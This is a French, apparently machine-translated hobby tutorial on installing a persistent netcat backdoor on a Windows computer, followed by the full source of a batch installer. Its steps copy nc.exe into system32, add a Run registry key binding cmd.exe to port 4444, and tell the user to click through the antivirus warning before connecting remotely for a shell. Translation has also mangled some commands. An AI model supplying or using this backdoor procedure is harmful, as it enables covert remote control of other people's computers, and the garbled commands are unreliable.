Netcat Fun ! : 5 étapes

2024 Auteur: John Day | [email protected]. Dernière modifié: 2024-01-30 09:09

Cette instructable vous montre comment créer une porte dérobée sur un ordinateur avec netcat ! Je vais vous montrer deux façons de le faire, avec et sans mon fichier batch qui l'automatise pour vous. Cette instructable suppose déjà que vous avez déjà les autorisations root sur l'ordinateur, probablement avec un 0phcrack LiveCD ici. Maintenant, sur l'instructable.

Étape 1: Téléchargez Netcat

Je vous ai épargné la peine de 3 minutes de recherche sur Google et j'ai mis nc.exe sur instructables à télécharger. En option, vous pouvez également télécharger nc.bat qui est un fichier batch que j'ai créé pour automatiser le processus pour vous. Assurez-vous que si vous téléchargez nc.bat, il s'agit de 464 octets, car j'ai continué à télécharger des versions et à découvrir que quelque chose n'allait pas. Si ce n'est pas 464 octets, le programme ne correspondra pas à cette instructable.

Étape 2: Avec Nc.bat

Tout d'abord, les deux fichiers doivent se trouver dans le même répertoire pour que nc.bat fonctionne correctement. Je suggère d'utiliser un lecteur flash ou un CD-ROM pour cette opération. J'ai utilisé un lecteur flash de geek Squad de 512 Mo pour cela, mais ce n'est que moi. Alors, copiez les fichiers sur votre périphérique multimédia externe et amenez-les sur l'ordinateur sur lequel vous avez root. Accédez au périphérique multimédia et double-cliquez sur nc.bat. Cela copiera le fichier nc.exe dans le dossier system32, à la racine du système (généralement C:\Windows ou C:\WINNT) et apportera les modifications nécessaires au registre. Ensuite, notez l'adresse IP. Ce sera quelque chose comme '192.168.1.103', qui est le mien. Une fois cela fait, redémarrez la machine et connectez-vous. Ensuite, le programme antivirus peut vous demander si vous souhaitez autoriser/interdire le programme. Cliquez sur « Autoriser » ou similaire. Gardez à l'esprit que dans cette instructable, vous ne pouvez que telnet à partir du réseau local de cet ordinateur. Ensuite, partez, ou déconnectez-vous, ou tout ce que vous voulez.

Étape 3: Sans Nc.bat

Pour ce faire, vous devez avoir nc.exe sur un CD ou une clé USB. Allez sur l'ordinateur, connectez-vous et branchez le lecteur flash ou insérez votre CD. À partir de là, il y a deux manières: Les interfaces utilisateur graphiques polies de Windows, ou la manière sale et démodée de l'invite de commande. et tapez:

cmd.exeNaviguez vers le flash ou votre lecteur de CD. Si vous ne savez pas quel lecteur est lequel, faites un clic droit sur le bouton Démarrer et cliquez sur Explorer. Cliquez sur tous les lecteurs non locaux dans Poste de travail jusqu'à ce que vous arriviez à votre lecteur flash/CD. Souvenez-vous de la lettre du lecteur et revenez à l'invite de commande. Tapez la lettre du lecteur suivie de deux points, comme ceci: K:Puis tapez une ligne à la fois, puis appuyez sur la touche retour

copier nc.exe %systemroot%\system32\nc.exereg ajouter HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 - t -e cmd.exe"C'était à peu près l'installation. Tout ce que vous devez savoir maintenant est l'adresse IP locale, qui peut être facilement trouvée en tapant la commande 'ipconfig' et en recherchant quelque chose dans le tableau comme "192.168.1.103". Ensuite, redémarrez la machine et reconnectez-vous. Le programme antivirus peut vous demander si vous souhaitez autoriser/interdire. Cliquez sur autoriser. Ensuite, vous êtes libre de faire ce que vous voulez avec l'ordinateur. Les interfaces graphiques peaufinées de WindowsCliquez avec le bouton droit sur le bouton Démarrer et cliquez sur Explorer. Cliquez sur tous les lecteurs non locaux dans Poste de travail jusqu'à ce que vous arriviez à votre lecteur flash/CD. Cliquez ensuite avec le bouton droit sur nc.exe et copiez. Ensuite, allez sur le lecteur C et cliquez sur le dossier Windows ou WINNT. Ensuite, allez dans le dossier system32 et collez nc.exe. Fermez-le et accédez à StartRun. Tapez regedit. Naviguez dans les dossiers jusqu'à: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunEnsuite, cliquez avec le bouton droit sur un espace vide et accédez à NewString Value. Tapez ce que vous voulez pour le nom, mais pour la valeur, tapez

%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exeC'était à peu près l'installation. Tout ce que vous devez savoir maintenant est l'adresse IP locale, qui peut facilement être trouvée en tapant la commande 'ipconfig' dans l'invite de commande (StartRun:cmd.exe) et en recherchant quelque chose dans le tableau comme "192.168.1.103". Ensuite, redémarrez la machine et reconnectez-vous. Le programme antivirus peut vous demander si vous souhaitez autoriser/interdire. Cliquez sur autoriser. Ensuite, vous êtes libre de faire ce que vous voulez avec l'ordinateur.

Étape 4: Revenir en arrière

Une fois que vous l'avez installé et que vous souhaitez prendre le contrôle de l'hôte, ouvrez l'invite de commande ou PuTTY. Je pense que PuTTY est génial, alors je vous laisse le télécharger ici. Utilisez PuTTYTéléchargez et ouvrez PuTTY.exe. Cliquez sur le protocole 'brut'. Dans la zone de texte n° de port, saisissez 4444. Dans la zone « adresse hôte », saisissez l'adresse IP que vous avez notée lors de l'installation. Puis appuyez sur Entrée. PuTTY devrait se connecter à la boîte et vous obtiendrez une invite de commande. À l'aide de l'invite de commandeOuvrez l'invite de commande et tapez « telnet 4444 ». Appuyez ensuite sur Entrée et vous devriez obtenir une invite de commande. Cela vous permettra de faire presque tout ce que vous voulez sur l'ordinateur à distance que vous pouvez faire avec un compte local. Cela commence vraiment à devenir intéressant lorsque vous entrez dans un ordinateur, puis dans un autre ordinateur à partir de cet ordinateur, pour connecter toute une chaîne d'ordinateurs. Amusez-vous (légalement) !

Étape 5: Code source

Parce qu'on m'a demandé, je vais mettre en place le code source (pour le fichier batch) et expliquer chaque commande et ce qu'elle fait. Être conscient! Il s'agit de la version actuelle du programme d'installation par lots. Si le vôtre est différent, le code sera différent.

@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 goto regeditgoto error:regeditreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc. exe -L -d -p 4444 -t -e cmd.exe"si errorlevel 0 goto ip:errorecho quelque chose d'inattendu s'est produit, et le programme doit quitter.goto end:ipecho notez l'adresse IP de la tableipconfig:endecho end.echo duct tape out.pause@echo off-Dit de ne pas afficher les commandes lors de l'exécution.copy nc.exe %systemroot%\system32\nc.exe-copie généralement netcat dans C:\WINDOWS\system32. Ainsi, lorsque vous revenez, au lieu de changer de répertoire tout le temps, vous pouvez simplement taper "nc" pour ouvrir un autre port. Si la copie a réussi, il continue à éditer l'erreur de registre.goto-Si une erreur s'est produite, allez à l'étiquette:error.:regedit-A, en spécifiant que lorsque le programme dit "goto regedit", pour aller ici.reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"-(supposé à être une ligne) qui ajoute la clé de registre pour redémarrer le programme lors du redémarrage. /f signifie écraser la clé existante, /v pour le nom de la clé, /d pour les données. Le reste des balises est entré pour netcat. -L dit de le redémarrer à la sortie, vous n'avez donc pas à attendre que l'ordinateur redémarre. -d j'ai oublié. -p 4444 spécifie le numéro de port. -j'ai oublié. -e cmd.exe lance l'invite de commande sur la connexion à distance. Si le niveau d'erreur 0 passe à la vérification des erreurs ip. Si l'exécution se passait mal, il sauterait cette ligne et descendrait à:error label.echo quelque chose d'inattendu s'est produit et le programme doit se fermer. " sur le screen.goto end-s'il est allé au message d'erreur, quelque chose s'est mal passé et le programme doit se fermer de toute façon.:ip-Encore une fois, label.echo notez l'adresse IP de la table-Writes " notez l'IP adresse de la table" vers screen.ipconfig-Il s'agit d'une commande qui imprime des informations sur les paramètres de votre réseau local (LAN).:end-Label.echo end.-écrit "end" sur le screen.echo duct tape out. -écrit "duct tape out" sur l'écran.pause-cette commande met le programme en pause et attend que l'utilisateur appuie sur une touche. Dans ce programme, il attend une entrée puis quitte le programme.